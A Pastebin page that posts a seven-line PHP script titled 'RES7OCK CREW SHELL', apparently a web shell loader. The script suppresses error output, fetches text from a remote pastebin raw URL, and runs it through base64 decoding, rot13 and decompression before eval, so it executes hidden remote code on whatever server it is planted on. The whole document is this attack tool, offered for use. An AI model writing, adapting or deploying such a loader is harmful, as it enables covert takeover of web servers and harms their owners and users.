Advertisement
GLADzTeguhID

[PHP] RES7OCK CREW SHELL

Sep 10th, 2016
446
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.22 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. $auth_pass = "";
  5. $res7ock= file_get_contents('http://pastebin.com/raw/Qu7ZKGeq');
  6. eval(str_rot13(gzinflate(str_rot13(base64_decode(($res7ock))))));
  7. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement